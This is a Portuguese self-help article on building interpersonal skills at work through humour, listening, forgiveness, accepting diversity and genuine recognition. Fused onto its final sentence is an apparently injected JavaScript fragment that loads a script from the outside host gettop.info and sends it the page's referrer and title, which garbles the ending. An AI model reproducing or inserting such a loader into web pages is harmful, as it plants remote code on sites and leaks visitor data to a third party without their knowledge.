Bons relacionamentos geram bons resultados profissionais

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Desenvolver uma competência interpessoal para os relacionamentos é imprescindível. Obviamente, se você for daqueles que buscam ser bem sucedidos na vida pessoal e na profissional. É importante saber que existem inúmeras variáveis que tornam a competência interpessoal um grande desafio humano.

O perfil da pessoa com quem você se relaciona, o ambiente onde está inserida, outras pessoas ligadas a ela, que tipo de expectativa tem, são fatores a ser observados. Podemos considerar que alguns comportamentos nas relações são importantes e seguem um adequado padrão.

Primeiro elemento imprescindível é procurar gostar das pessoas. Focar principalmente no que elas têm de virtudes e não nos defeitos. Ter interesse nas pessoas e demonstrar para elas que você aprecia aquilo que elas fazem e como elas são. Em outras palavras, aplique o DI – Demonstração da Importância. Esse comportamento abrirá o canal da reciprocidade, e esteja sempre disponível para ajudá-las quando precisarem.

O segundo elemento é o humor. A característica de uma pessoa sociável é o sorriso. O bom humor seduz, pois, é algo que faz com que se sintam valorizadas e respeitadas. Transmita sentimentos bons através do bom humor. Pessoas bem humoradas inspiram confiança.

Algumas pessoas não querem que resolvam problemas por elas, mas diante dos seus próprios desafios querem ser ouvidas. A sua capacidade de ouvir atentamente é proporcional ao relacionamento saudável. Esse é o terceiro elemento altamente valioso e muito valorizado pelas pessoas. Ouvir com atenção é um comportamento que cria um vínculo afetivo fazendo de você interessante para o outro.

Quarto elemento é o perdão.  Sua prática está em desuso, substituído, lamentavelmente, pelo rancor. Evidente que numa jornada juntos surgirá aborrecimentos e até conflitos. Não levar para o lado pessoal fazendo com que o outro perceba que não há rancor em você é encantador.

Quinto elemento é aceitar a diversidade. Sem perceber, estamos julgando o tempo todo e querendo que o outro seja do jeito que queremos que ele seja. Pare com essa ideia absurda de querer mudar as pessoas. Os diferentes se tornam iguais quando aceitam a diversidade.

Sexto elemento é reconhecer as pessoas. Todos possuem qualidades e fazem coisas bem feitas. Esteja atento a reconhecer e seja autêntico com o reconhecimento. Evite fazer elogios para apenas elevar a autoestima do outro. Isso pode parecer falso. O reconhecimento é nas atitudes e nas ações boas que outro praticou.

Portanto, gostar das pessoas, bom humor, energia positiva, ouvir com atenção, saber perdoar, aceitar a diversidade e praticar o reconhecimento vão, certamente, elevar a sua competência interpessoal.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

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